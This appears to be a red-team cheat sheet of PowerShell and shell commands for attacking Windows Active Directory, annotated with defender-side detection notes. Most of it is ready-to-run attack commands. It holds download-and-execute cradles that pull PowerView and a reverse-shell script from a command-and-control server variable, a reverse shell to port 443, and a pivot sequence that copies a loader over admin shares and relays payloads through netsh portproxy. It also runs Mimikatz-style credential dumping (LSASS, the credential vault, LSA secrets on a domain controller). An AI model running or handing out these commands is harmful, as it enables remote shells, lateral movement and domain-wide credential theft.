load
load-c2agent
load-powersploit
- discov/ad#load-powersploit
# $zc2srv_ip is an empty placeholder for the server address. The line fetches
# PowerView.ps1 over plain HTTP with Net.WebClient.DownloadString and passes the
# returned text to Invoke-Expression, so the script is evaluated from memory
# rather than from a file on disk.
# Defender view: PowerShell script block logging (Event ID 4104) records the
# evaluated script text, and the unencrypted download is visible to a web proxy
# or network sensor.
iex ($zc2srv_ip="") iex ((New-Object Net.WebClient).DownloadString("http://${zc2srv_ip}/PowerView.ps1"))
load-rshell
# python
# Starts /bin/bash attached to a pseudo-terminal through Python's pty module.
# Defender view: a python process whose command line contains pty.spawn and
# whose child is an interactive shell is a common process-tree detection.
python -c 'import pty; pty.spawn("/bin/bash")'
# powershell
# Fetches Invoke-PowerShellTcp.ps1 over HTTP with Invoke-WebRequest, evaluates
# it, then calls Power -Reverse with the server address and port 443.
# Defender view: the full iex/iwr command line is captured by process-creation
# logging (Event ID 4688 with command-line auditing, or Sysmon Event ID 1), and
# the evaluated script by script block logging (Event ID 4104).
powershell.exe iex (iwr http://${zc2srv_ip}/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress ${zc2srv_ip} -Port 443
load-rubeus
run
evasion-amsi
privesc
discov-ad-iter
creds-dump
pivot
loader-4-proxified-payload
# Sequence: place a loader binary on a remote host, add a local port-forward
# there, then have the loader fetch its payload through 127.0.0.1:8080 so the
# remote host's HTTP request goes to itself and is relayed to the server.
# The commented-out assignments below are sample values for the placeholders.
#$zloader="Loader.exe"
#$zc2srv_ip="172.16.100.83"
#$zpayload="SafetyKatz.exe"
#$zpayload="PowerUp.ps1"
# Downloads the loader over plain HTTP and writes it to the -OutFile path.
iwr http://${zc2srv_ip}/${zloader} -OutFile C:\User\Public\${zloader}
# $ztarg_computer_name=""
# Copies the loader to the target through its C$ administrative share; echo Y
# pre-answers an xcopy prompt (presumably the overwrite confirmation).
# Defender view: writes to C$ are recorded as Event ID 5145 when detailed file
# share auditing is enabled.
echo Y | xcopy C:\Users\Public\${zloader} \\${ztarg_computer_name}\C$\Users\Public\${zloader}
# Over WinRS (the WinRM remote shell), adds a netsh portproxy rule on the
# target: TCP 8080 on all interfaces is relayed to port 80 on the server.
# "$null |" hands winrs an empty stdin (presumably so it does not wait on input).
# Defender view: portproxy rules are stored under
# HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, are listed by
# "netsh interface portproxy show all", and persist across reboots; with
# listenaddress=0.0.0.0 the relay is reachable by any host that can reach 8080.
# Commands started through winrs run on the target as children of winrshost.exe.
$null | winrs -r:${ztarg_computer_name} "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=${zc2srv_ip}"
# Runs the loader on the target, pointing it at SafetyKatz.exe behind the local
# relay. sekurlsa:: and vault:: are Mimikatz module names that read credential
# material from LSASS memory and from the Windows credential vault.
# Defender view: process access to lsass.exe (Sysmon Event ID 10) is the main
# host signal; LSA protection (RunAsPPL) and Credential Guard limit what such
# reads can return.
$null | winrs -r:${ztarg_computer_name} "cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"
$null | winrs -r:${ztarg_computer_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"'
# $ztarg_nexthop_name=""
# The same four steps (copy, port-forward, two loader runs) against a second
# host named by $ztarg_nexthop_name; the same artifacts apply on that host.
echo Y | xcopy C:\Users\Public\${zloader} \\${ztarg_nexthop_name}\C$\Users\Public\${zloader}
$null | winrs -r:${ztarg_nexthop_name} "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=${zc2srv_ip}"
$null | winrs -r:${ztarg_nexthop_name} "cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::evasive-keys exit"
$null | winrs -r:${ztarg_nexthop_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"'
# $ztarg_computer_name IS a DC
# lsadump:: is the Mimikatz module family that reads LSA-held account secrets.
# On a domain controller that covers domain accounts, so evidence of this step
# should be handled as a domain-wide credential exposure, not a single-host one.
$null | winrs -r:${ztarg_computer_name} 'cmd /c C:\Users\Public\${zloader} -path http://127.0.0.1:8080/SafetyKatz.exe "lsadump::evasive-lsa /patch" "exit"'